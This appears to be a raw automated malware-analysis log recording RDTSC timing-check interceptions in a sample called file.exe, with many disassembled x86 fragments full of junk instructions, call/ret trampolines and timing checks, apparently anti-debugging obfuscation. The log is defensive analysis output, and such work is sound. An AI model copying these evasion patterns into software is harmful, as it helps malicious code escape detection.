                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6789 second address: 6F67CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FD3C4756156h 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FD3C4756156h 0x00000015 popad 0x00000016 jmp 00007FD3C4756163h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD3C4756166h 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA100 second address: 6FA10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD3C524B206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA10F second address: 581BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C475615Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 00299001h 0x00000011 mov dword ptr [ebp+122D19ADh], ecx 0x00000017 push dword ptr [ebp+122D13FDh] 0x0000001d add dword ptr [ebp+122D1C3Fh], eax 0x00000023 call dword ptr [ebp+122D1E69h] 0x00000029 pushad 0x0000002a cld 0x0000002b xor eax, eax 0x0000002d jns 00007FD3C4756164h 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 mov dword ptr [ebp+122D26FCh], edx 0x0000003d mov dword ptr [ebp+122D3824h], eax 0x00000043 mov dword ptr [ebp+122D26FCh], ecx 0x00000049 mov esi, 0000003Ch 0x0000004e jmp 00007FD3C475615Eh 0x00000053 pushad 0x00000054 movsx ebx, ax 0x00000057 mov edi, ecx 0x00000059 popad 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e add dword ptr [ebp+122D184Ah], eax 0x00000064 lodsw 0x00000066 clc 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D26FCh], edi 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 pushad 0x00000076 mov ecx, 5CBB14DCh 0x0000007b xor dword ptr [ebp+122D184Ah], ecx 0x00000081 popad 0x00000082 nop 0x00000083 pushad 0x00000084 jmp 00007FD3C4756161h 0x00000089 pushad 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA157 second address: 6FA1B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C524B20Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d jl 00007FD3C524B20Ch 0x00000013 mov dword ptr [ebp+122D2527h], ebx 0x00000019 and ax, 4651h 0x0000001e popad 0x0000001f push 00000000h 0x00000021 call 00007FD3C524B209h 0x00000026 jbe 00007FD3C524B20Ah 0x0000002c push edx 0x0000002d push edx 0x0000002e pop edx 0x0000002f pop edx 0x00000030 push eax 0x00000031 push ecx 0x00000032 jnl 00007FD3C524B208h 0x00000038 pop ecx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FD3C524B20Fh 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA1B6 second address: 6FA1C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C475615Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA1C6 second address: 6FA21E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C524B219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnc 00007FD3C524B21Ah 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD3C524B217h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA21E second address: 6FA22E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C475615Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA348 second address: 6FA38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FD3C524B208h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D28F7h], edi 0x00000029 mov cx, ax 0x0000002c push 00000000h 0x0000002e mov ecx, dword ptr [ebp+122D1C3Fh] 0x00000034 push 675CB780h 0x00000039 push edi 0x0000003a push eax 0x0000003b push edx 0x0000003c jns 00007FD3C524B206h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA436 second address: 6FA491 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4756167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FD3C4756158h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov esi, edi 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D1986h], eax 0x00000032 mov di, A626h 0x00000036 popad 0x00000037 push 89E31619h 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B0F2 second address: 70B0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B0F6 second address: 70B0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718814 second address: 718819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7189F1 second address: 7189FB instructions: 0x00000000 rdtsc 0x00000002 je 00007FD3C4756156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718FD3 second address: 718FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718FD9 second address: 718FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FD3C4756156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FD3C475615Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71941E second address: 71943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD3C524B218h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71943E second address: 719442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719442 second address: 719464 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3C524B206h 0x00000008 jmp 00007FD3C524B218h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719464 second address: 71946E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD3C4756156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71946E second address: 719497 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD3C524B206h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD3C524B214h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71960A second address: 719610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719610 second address: 719614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71977F second address: 719783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719783 second address: 71978B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719900 second address: 719906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719906 second address: 71990C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719C03 second address: 719C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719C07 second address: 719C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719C0D second address: 719C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FD3C4756156h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719C1D second address: 719C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A23A second address: 71A251 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3C4756156h 0x00000008 jmp 00007FD3C475615Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A251 second address: 71A25B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD3C524B206h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A25B second address: 71A25F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A519 second address: 71A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 js 00007FD3C524B206h 0x0000000e jmp 00007FD3C524B212h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A53E second address: 71A550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C475615Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A550 second address: 71A55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726185 second address: 72618E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72618E second address: 726192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726192 second address: 72619C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C4756156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725CF7 second address: 725D1B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD3C524B21Fh 0x00000008 jmp 00007FD3C524B219h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72691D second address: 726921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726921 second address: 72692B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3C524B206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72692B second address: 726956 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3C4756168h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 je 00007FD3C4756156h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726956 second address: 72695B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72695B second address: 726971 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jne 00007FD3C4756156h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726971 second address: 726995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD3C524B20Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FD3C524B206h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726995 second address: 726999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726999 second address: 72699F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7278D1 second address: 7278E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3C4756160h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EE4 second address: 727EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EE8 second address: 727F48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007FD3C4756161h 0x0000000d nop 0x0000000e mov di, cx 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+1244ACD4h], edi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FD3C4756158h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 jmp 00007FD3C4756162h 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AF72 second address: 72AFE9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3C4C2635Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jbe 00007FD3C4C2634Ch 0x00000012 pop ebx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FD3C4C26348h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1DC0h], eax 0x00000034 adc si, 3BD6h 0x00000039 push 00000000h 0x0000003b sub dword ptr [ebp+1244CEFFh], ebx 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D1DC0h], edx 0x00000049 xchg eax, ebx 0x0000004a pushad 0x0000004b push eax 0x0000004c jl 00007FD3C4C26346h 0x00000052 pop eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 pop eax 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B856 second address: 72B860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B860 second address: 72B88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C4C26358h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jg 00007FD3C4C26348h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C3C2 second address: 72C3C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C67D second address: 72C681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C681 second address: 72C6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FD3C4DD8D68h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+1244CEE6h], edx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007FD3C4DD8D68h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 xor edi, 5E2D850Eh 0x0000004c cld 0x0000004d push 00000000h 0x0000004f mov esi, 21D8021Fh 0x00000054 xchg eax, ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 jne 00007FD3C4DD8D77h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C6FF second address: 72C71B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD3C4C2634Ch 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FD3C4C26346h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E8D4 second address: 72E8EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FD3C4DD8D6Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E8EC second address: 72E923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007FD3C4C26350h 0x0000000d sub di, F27Ah 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 mov edi, dword ptr [ebp+122D268Dh] 0x0000001b push 00000000h 0x0000001d mov esi, 7B760C1Dh 0x00000022 xchg eax, ebx 0x00000023 push edi 0x00000024 jp 00007FD3C4C2634Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E923 second address: 72E92E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F174 second address: 72F178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733A66 second address: 733AE7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FD3C4DD8D6Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 jmp 00007FD3C4DD8D78h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FD3C4DD8D68h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jbe 00007FD3C4DD8D6Ch 0x00000039 or edi, dword ptr [ebp+122D268Dh] 0x0000003f xchg eax, esi 0x00000040 jno 00007FD3C4DD8D80h 0x00000046 push eax 0x00000047 push edx 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735A6D second address: 735A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C2634Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FD3C4C2634Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FD3C4C26346h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735A97 second address: 735AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+1244AC03h], edx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FD3C4DD8D68h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov dword ptr [ebp+12451400h], esi 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007FD3C4DD8D6Eh 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734D0F second address: 734DBB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD3C4C2634Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FD3C4C26348h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, 4502D0B1h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007FD3C4C26348h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d add bx, BD01h 0x00000052 cmc 0x00000053 mov dword ptr fs:[00000000h], esp 0x0000005a pushad 0x0000005b mov ecx, dword ptr [ebp+122D2400h] 0x00000061 mov dword ptr [ebp+1244AC33h], edi 0x00000067 popad 0x00000068 mov eax, dword ptr [ebp+122D1005h] 0x0000006e mov edi, dword ptr [ebp+122D251Bh] 0x00000074 push FFFFFFFFh 0x00000076 mov dword ptr [ebp+1245D950h], ecx 0x0000007c cmc 0x0000007d nop 0x0000007e jmp 00007FD3C4C26351h 0x00000083 push eax 0x00000084 pushad 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735AE6 second address: 735AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735AEC second address: 735AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735AF0 second address: 735AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736A6E second address: 736AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FD3C4C26348h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 pushad 0x00000026 jng 00007FD3C4C2634Ch 0x0000002c mov dword ptr [ebp+122DB640h], ecx 0x00000032 add dword ptr [ebp+122D1C7Eh], edi 0x00000038 popad 0x00000039 push 00000000h 0x0000003b add bl, 00000012h 0x0000003e mov dword ptr [ebp+1244C7FBh], edi 0x00000044 push 00000000h 0x00000046 xor bh, FFFFFFA1h 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 